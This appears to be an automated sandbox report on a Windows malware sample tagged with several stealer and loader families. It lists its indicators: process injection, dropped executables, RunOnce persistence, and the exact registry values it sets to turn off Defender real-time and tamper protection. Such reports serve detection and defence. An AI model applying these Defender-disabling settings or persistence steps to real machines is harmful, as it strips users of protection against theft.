Malware Analysis Report

2025-08-05 16:13

Sample ID 231026-g9lkxseb49
Target 43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4
SHA256 43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4

Threat Level: Known bad

The file 43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4 was found to be: Known bad.

Malicious Activity Summary

ZGRat

Detect ZGRat V1

DcRat

RedLine

RedLine payload

Modifies Windows Defender Real-time Protection settings

SmokeLoader

Amadey

Raccoon Stealer payload

Glupteba

Raccoon

Glupteba payload

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Windows security modification

Executes dropped EXE

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 06:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 06:30

Reported

2023-10-26 06:32

Platform

win10v2004-20231023-en

Max time kernel

32s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\D508.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D229.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\CDCF.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3688 set thread context of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\DB43.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D229.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3688 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3324 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe
PID 3324 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe
PID 3324 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe
PID 3324 wrote to memory of 1220 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF57.exe
PID 3324 wrote to memory of 1220 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF57.exe
PID 3324 wrote to memory of 1220 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF57.exe
PID 1972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe
PID 1972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe
PID 1972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\CDCF.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe
PID 3324 wrote to memory of 4236 N/A N/A C:\Windows\system32\cmd.exe
PID 3324 wrote to memory of 4236 N/A N/A C:\Windows\system32\cmd.exe
PID 956 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe
PID 956 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe
PID 956 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe
PID 2100 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe
PID 2100 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe
PID 2100 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe
PID 3324 wrote to memory of 4104 N/A N/A C:\Users\Admin\AppData\Local\Temp\D15D.exe
PID 3324 wrote to memory of 4104 N/A N/A C:\Users\Admin\AppData\Local\Temp\D15D.exe
PID 3324 wrote to memory of 4104 N/A N/A C:\Users\Admin\AppData\Local\Temp\D15D.exe
PID 3324 wrote to memory of 3644 N/A N/A C:\Users\Admin\AppData\Local\Temp\D229.exe
PID 3324 wrote to memory of 3644 N/A N/A C:\Users\Admin\AppData\Local\Temp\D229.exe
PID 3324 wrote to memory of 3644 N/A N/A C:\Users\Admin\AppData\Local\Temp\D229.exe
PID 4444 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe
PID 4444 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe
PID 4444 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe
PID 2200 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe
PID 2200 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe
PID 2200 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe
PID 3324 wrote to memory of 2196 N/A N/A C:\Users\Admin\AppData\Local\Temp\D508.exe
PID 3324 wrote to memory of 2196 N/A N/A C:\Users\Admin\AppData\Local\Temp\D508.exe
PID 3324 wrote to memory of 2196 N/A N/A C:\Users\Admin\AppData\Local\Temp\D508.exe
PID 4236 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4236 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3324 wrote to memory of 4068 N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe
PID 3324 wrote to memory of 4068 N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe
PID 3324 wrote to memory of 4068 N/A N/A C:\Users\Admin\AppData\Local\Temp\DB43.exe
PID 4880 wrote to memory of 2672 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 2672 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4236 wrote to memory of 4972 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4236 wrote to memory of 4972 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2196 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\D508.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2196 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\D508.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2196 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\D508.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4972 wrote to memory of 1048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 1048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 452 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\system32\BackgroundTaskHost.exe
PID 452 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\system32\BackgroundTaskHost.exe
PID 452 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\system32\BackgroundTaskHost.exe
PID 452 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 452 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 452 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4880 wrote to memory of 788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe

"C:\Users\Admin\AppData\Local\Temp\43f27236cc3229c02b6c6e79241a929bee5d689f3ff80bae0f5dc57c2c6c44e4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

C:\Users\Admin\AppData\Local\Temp\CF57.exe

C:\Users\Admin\AppData\Local\Temp\CF57.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D052.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe

C:\Users\Admin\AppData\Local\Temp\D15D.exe

C:\Users\Admin\AppData\Local\Temp\D15D.exe

C:\Users\Admin\AppData\Local\Temp\D229.exe

C:\Users\Admin\AppData\Local\Temp\D229.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe

C:\Users\Admin\AppData\Local\Temp\D508.exe

C:\Users\Admin\AppData\Local\Temp\D508.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\DB43.exe

C:\Users\Admin\AppData\Local\Temp\DB43.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa96e146f8,0x7ffa96e14708,0x7ffa96e14718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

